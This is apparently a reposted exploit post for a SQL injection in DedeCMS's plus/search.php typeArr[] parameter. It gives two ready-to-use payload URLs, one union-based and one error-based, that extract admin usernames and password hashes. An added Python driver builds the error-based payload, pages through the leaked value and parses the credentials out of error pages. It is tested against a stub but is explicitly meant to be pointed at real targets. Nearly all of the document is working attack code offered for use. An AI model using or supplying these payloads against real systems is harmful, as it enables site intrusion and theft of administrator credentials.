Safe Alert: Request Error step 2 !

then use the exploit (exp) below directly. It is a union-based injection: userid and pwd are placed in columns 11 and 27 of the 42-column select and echoed back in the page.

xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

Check the result. If instead it shows

Safe Alert: Request Error step 1 !

then use the exp below directly. This one is error-based: the duplicate group key from floor(rand(0)*2) makes MySQL echo "userid|pwd" inside a Duplicate entry error.

xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

If the page displays normally, that proves the vulnerability no longer exists.
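The following is an added example, not code from the original post: a small offline driver for the error-based exp above. It builds that payload with a movable substring window (the post's substring(...,1,62) only returns the first 62 characters, because MySQL truncates the value in a Duplicate entry error at 64), parses the leaked value out of the error text, and pages through a row longer than one window. The host xx.com is the post's placeholder; the search.php path, the sample admin row and fake_server() are assumptions or constructed data, so nothing touches the network.

```python
"""
Added example, not code from the original post: offline driver for the
error-based DedeCMS plus/search.php typeArr[] exp. The host (xx.com, from
the post), the search.php path and the sample admin row are assumptions /
constructed data; fake_server() stands in for the target.
"""
import re
from typing import Callable, Optional
from urllib.parse import quote_plus, unquote_plus

BASE = "http://xx.com/plus/search.php"  # placeholder host taken from the post

# MySQL truncates the value echoed in a "Duplicate entry '...'" error at 64
# characters. One of them is the floor(rand(0)*2) digit, so the post reads
# 62 characters per request; anything longer needs further requests.
WIDTH = 62

DUP_RE = re.compile(r"Duplicate entry '([^']*)' for key")
WINDOW_RE = re.compile(r"limit (\d+),1\),(\d+),(\d+)\)")  # used only by the fake server


def pick_exp(body: str) -> Optional[str]:
    """Decision from the post: which exp to use, based on the DedeCMS CheckSql alert."""
    if "Request Error step 2" in body:
        return "union"
    if "Request Error step 1" in body:
        return "error"
    return None  # page renders normally: injection point is patched


def error_based_fragment(row: int, start: int, width: int = WIDTH) -> str:
    """The post's second exp, parameterised by admin row and substring window.

    `#@__admin` is DedeCMS's table-prefix placeholder (rewritten to e.g.
    dede_admin); the @`\\'` wrapper is the filter bypass used in the post.
    """
    leak = f"(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit {row},1)"
    return (
        "111=@`\\'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
        f"(substring({leak},{start},{width})))a from information_schema.tables group by a)b)#@`\\'` "
    )


def exploit_url(row: int, start: int, width: int = WIDTH) -> str:
    """Full URL: the fragment goes into the array *key* of typeArr, which PHP url-decodes."""
    return f"{BASE}?keyword=as&typeArr[{quote_plus(error_based_fragment(row, start, width))}]=a"


def leaked_chunk(body: str) -> Optional[str]:
    """Pull the substring window out of the error page; None if no duplicate-entry error."""
    m = DUP_RE.search(body)
    if not m:
        return None
    return m.group(1)[1:]  # drop the leading floor(rand(0)*2) digit


def dump_row(fetch: Callable[[str], str], row: int = 0, width: int = WIDTH) -> str:
    """Walk the substring window forward until a short (or empty) chunk comes back."""
    out, start = "", 1
    while True:
        chunk = leaked_chunk(fetch(exploit_url(row, start, width)))
        if not chunk:
            break
        out += chunk
        if len(chunk) < width:
            break
        start += width
    return out


# Constructed sample row "|userid|pwd". The real DedeCMS pwd column is a
# 20-char md5 slice; this one is padded so the paging path is exercised.
SAMPLE_ROW = "|admin|" + "0123456789abcdef" * 5


def fake_server(url: str) -> str:
    """Stand-in target: answers like a vulnerable host hitting the duplicate-key error."""
    m = WINDOW_RE.search(unquote_plus(url))
    if not m:
        return "<html>normal search page</html>"
    row, start, width = (int(x) for x in m.groups())
    value = SAMPLE_ROW if row == 0 else ""      # only one admin row in the sample
    chunk = value[start - 1:start - 1 + width]  # MySQL substring() is 1-based
    return f"Error infos: Duplicate entry '1{chunk}' for key 'group_key'"


if __name__ == "__main__":
    print(dump_row(fake_server))
```

Against a real target you would replace fake_server with a function that performs the GET and returns the body; dump_row stops on its own when a window comes back shorter than WIDTH, so a standard 20-character DedeCMS hash needs only one request.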
Reposting without the author's name? You've got no balls.